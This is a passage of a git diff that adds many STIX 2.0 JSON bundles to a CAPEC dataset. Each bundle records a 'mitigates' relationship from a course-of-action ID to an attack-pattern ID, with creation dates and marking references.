"relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d", + "target_ref": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063.json b/capec/relationship/relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063.json new file mode 100644 index 0000000000..3858c5735d --- /dev/null +++ b/capec/relationship/relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--86448ae7-b238-4865-8b16-9c8dbca46af1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--166fe84f-a603-45c3-99ba-785be6639265", + "target_ref": "attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6.json b/capec/relationship/relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6.json new file mode 100644 index 0000000000..7f64b0ccd9 --- /dev/null +++ b/capec/relationship/relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--402ca0da-d1dd-4f42-9b45-d0eb5e76927e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca984166-6914-410d-bb5a-97d296f8a505", + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d7270969-0769-46e7-8213-d5b854f35036.json b/capec/relationship/relationship--d7270969-0769-46e7-8213-d5b854f35036.json new file mode 100644 index 0000000000..b6967601cc --- /dev/null +++ b/capec/relationship/relationship--d7270969-0769-46e7-8213-d5b854f35036.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--53fb5cef-81d5-4965-8cbc-4de5cec84f95", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d7270969-0769-46e7-8213-d5b854f35036", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--59125c5d-d363-4939-9367-09200b835952", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d77dd200-9428-4542-ac9f-78ad58d97e44.json b/capec/relationship/relationship--d77dd200-9428-4542-ac9f-78ad58d97e44.json new file mode 100644 index 0000000000..d58139b4ef --- /dev/null +++ b/capec/relationship/relationship--d77dd200-9428-4542-ac9f-78ad58d97e44.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--98444db0-c82e-498a-bd4f-80929e957dd8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d77dd200-9428-4542-ac9f-78ad58d97e44", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132", + "target_ref": "attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822.json b/capec/relationship/relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822.json new file mode 100644 index 0000000000..b3aebf660c --- /dev/null +++ b/capec/relationship/relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--df57facd-bc39-4388-80de-de2c4ad3b1db", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96", + "target_ref": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a.json b/capec/relationship/relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a.json new file mode 100644 index 0000000000..603e419a95 --- /dev/null +++ b/capec/relationship/relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d0c395cd-8e34-4b66-ac80-9d7b2806d326", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d8998cbe-e124-485a-85ca-beca9108afce.json b/capec/relationship/relationship--d8998cbe-e124-485a-85ca-beca9108afce.json new file mode 100644 index 0000000000..5513edb024 --- /dev/null +++ b/capec/relationship/relationship--d8998cbe-e124-485a-85ca-beca9108afce.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1f2bce6e-d20f-4429-a102-5aa6bb19007c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d8998cbe-e124-485a-85ca-beca9108afce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829.json b/capec/relationship/relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829.json new file mode 100644 index 0000000000..28008ca5ba --- /dev/null +++ b/capec/relationship/relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f80e7ebd-72de-45e7-8f39-4257e1d4393f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab", + "target_ref": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96.json b/capec/relationship/relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96.json new file mode 100644 index 0000000000..6dbf0c1f09 --- /dev/null +++ b/capec/relationship/relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8af7a1f4-b963-4cdb-b9a3-20d1d97be3fe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d970ad7b-bf7a-494f-bb14-0ad408590f7f.json b/capec/relationship/relationship--d970ad7b-bf7a-494f-bb14-0ad408590f7f.json new file mode 100644 index 0000000000..f9ff5e2fc5 --- /dev/null +++ b/capec/relationship/relationship--d970ad7b-bf7a-494f-bb14-0ad408590f7f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b42b994e-0bc7-45f2-87ac-e4b7286167d1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d970ad7b-bf7a-494f-bb14-0ad408590f7f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad", + "target_ref": "attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d976aa2c-3f03-4383-b45e-c998a45082ec.json b/capec/relationship/relationship--d976aa2c-3f03-4383-b45e-c998a45082ec.json new file mode 100644 index 0000000000..d9670c31f4 --- /dev/null +++ b/capec/relationship/relationship--d976aa2c-3f03-4383-b45e-c998a45082ec.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b09475e9-dcbf-47df-971a-88da3920a394", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d976aa2c-3f03-4383-b45e-c998a45082ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fab76528-99af-4cf9-8786-33b6ca964343", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da.json b/capec/relationship/relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da.json new file mode 100644 index 0000000000..052af3c4c0 --- /dev/null +++ b/capec/relationship/relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9b2dff67-2181-4933-adde-b292d76828c8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90", + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35.json b/capec/relationship/relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35.json new file mode 100644 index 0000000000..5d73128ee1 --- /dev/null +++ b/capec/relationship/relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a78f3455-4a5a-4ee0-b35b-da4f66f8a7fc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--d9d4d723-586f-4c3a-a8b7-ca4c09b95834.json b/capec/relationship/relationship--d9d4d723-586f-4c3a-a8b7-ca4c09b95834.json new file mode 100644 index 0000000000..61332700e4 --- /dev/null +++ b/capec/relationship/relationship--d9d4d723-586f-4c3a-a8b7-ca4c09b95834.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--10aa65f0-dccc-4f1b-b839-e28613a9cb5e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d9d4d723-586f-4c3a-a8b7-ca4c09b95834", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a", + "target_ref": "attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--da069bcf-e3fc-45a2-8488-8326ecf63287.json b/capec/relationship/relationship--da069bcf-e3fc-45a2-8488-8326ecf63287.json new file mode 100644 index 0000000000..bae22d998b --- /dev/null +++ b/capec/relationship/relationship--da069bcf-e3fc-45a2-8488-8326ecf63287.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8602bb38-eb37-4a88-bfa4-4341c1ced0cd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--da069bcf-e3fc-45a2-8488-8326ecf63287", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0", + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--da3beacf-86f4-48b1-b708-6d616e14a15e.json b/capec/relationship/relationship--da3beacf-86f4-48b1-b708-6d616e14a15e.json new file mode 100644 index 0000000000..1e57ddcec0 --- /dev/null +++ b/capec/relationship/relationship--da3beacf-86f4-48b1-b708-6d616e14a15e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--64d6772e-16e1-4970-acfb-415492062271", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--da3beacf-86f4-48b1-b708-6d616e14a15e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870", + "target_ref": "attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--daa0a22b-2612-43c3-b60b-8550dfbbda10.json b/capec/relationship/relationship--daa0a22b-2612-43c3-b60b-8550dfbbda10.json new file mode 100644 index 0000000000..75a73db4a0 --- /dev/null +++ b/capec/relationship/relationship--daa0a22b-2612-43c3-b60b-8550dfbbda10.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6e15e857-9b0c-4fb1-9bc2-f3450a7468cd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--daa0a22b-2612-43c3-b60b-8550dfbbda10", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a", + "target_ref": "attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d.json b/capec/relationship/relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d.json new file mode 100644 index 0000000000..db7e3e7e20 --- /dev/null +++ b/capec/relationship/relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--793bf0e8-5ae9-45a0-8b96-623af1cb0289", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012", + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--db1f1278-148e-4811-b44c-d2691ae606e0.json b/capec/relationship/relationship--db1f1278-148e-4811-b44c-d2691ae606e0.json new file mode 100644 index 0000000000..b9ffbed928 --- /dev/null +++ b/capec/relationship/relationship--db1f1278-148e-4811-b44c-d2691ae606e0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--60895263-a6e3-4923-b2a3-cc3f3d5fafa4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--db1f1278-148e-4811-b44c-d2691ae606e0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a", + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034.json b/capec/relationship/relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034.json new file mode 100644 index 0000000000..c6fc9f05f5 --- /dev/null +++ b/capec/relationship/relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dd1ef62b-2332-49bf-a81e-025aa7d1a2ba", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee", + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15.json b/capec/relationship/relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15.json new file mode 100644 index 0000000000..1b2cd618ee --- /dev/null +++ b/capec/relationship/relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e477d2bd-07c0-4fd4-98f0-1c94cf18047f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f.json b/capec/relationship/relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f.json new file mode 100644 index 0000000000..7063065628 --- /dev/null +++ b/capec/relationship/relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5b4d9e86-78a9-4d34-b0f9-32edb9a6e892", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c", + "target_ref": "attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85.json b/capec/relationship/relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85.json new file mode 100644 index 0000000000..02d80764a8 --- /dev/null +++ b/capec/relationship/relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bc9094bf-8fb9-40a1-866b-eb5bd617e0e8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72", + "target_ref": "attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dc8b3664-52e4-4864-ab89-3926d27aa304.json b/capec/relationship/relationship--dc8b3664-52e4-4864-ab89-3926d27aa304.json new file mode 100644 index 0000000000..a4442ea216 --- /dev/null +++ b/capec/relationship/relationship--dc8b3664-52e4-4864-ab89-3926d27aa304.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4477299c-5dae-4a58-9c23-0a407a67143a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dc8b3664-52e4-4864-ab89-3926d27aa304", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2", + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316.json b/capec/relationship/relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316.json new file mode 100644 index 0000000000..ba477d30ed --- /dev/null +++ b/capec/relationship/relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--15539a27-015f-494a-ac6f-f721c8bae839", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c", + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dcd48fbc-b429-4c89-b428-733efabf98b6.json b/capec/relationship/relationship--dcd48fbc-b429-4c89-b428-733efabf98b6.json new file mode 100644 index 0000000000..59b53540f7 --- /dev/null +++ b/capec/relationship/relationship--dcd48fbc-b429-4c89-b428-733efabf98b6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--99b68277-1f1b-4d9d-804a-d7b72f0b3605", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dcd48fbc-b429-4c89-b428-733efabf98b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7", + "target_ref": "attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4.json b/capec/relationship/relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4.json new file mode 100644 index 0000000000..16c97eefa2 --- /dev/null +++ b/capec/relationship/relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c7050503-fd42-4832-8c48-eab669e3be34", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094", + "target_ref": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74.json b/capec/relationship/relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74.json new file mode 100644 index 0000000000..91a1ad13fe --- /dev/null +++ b/capec/relationship/relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": 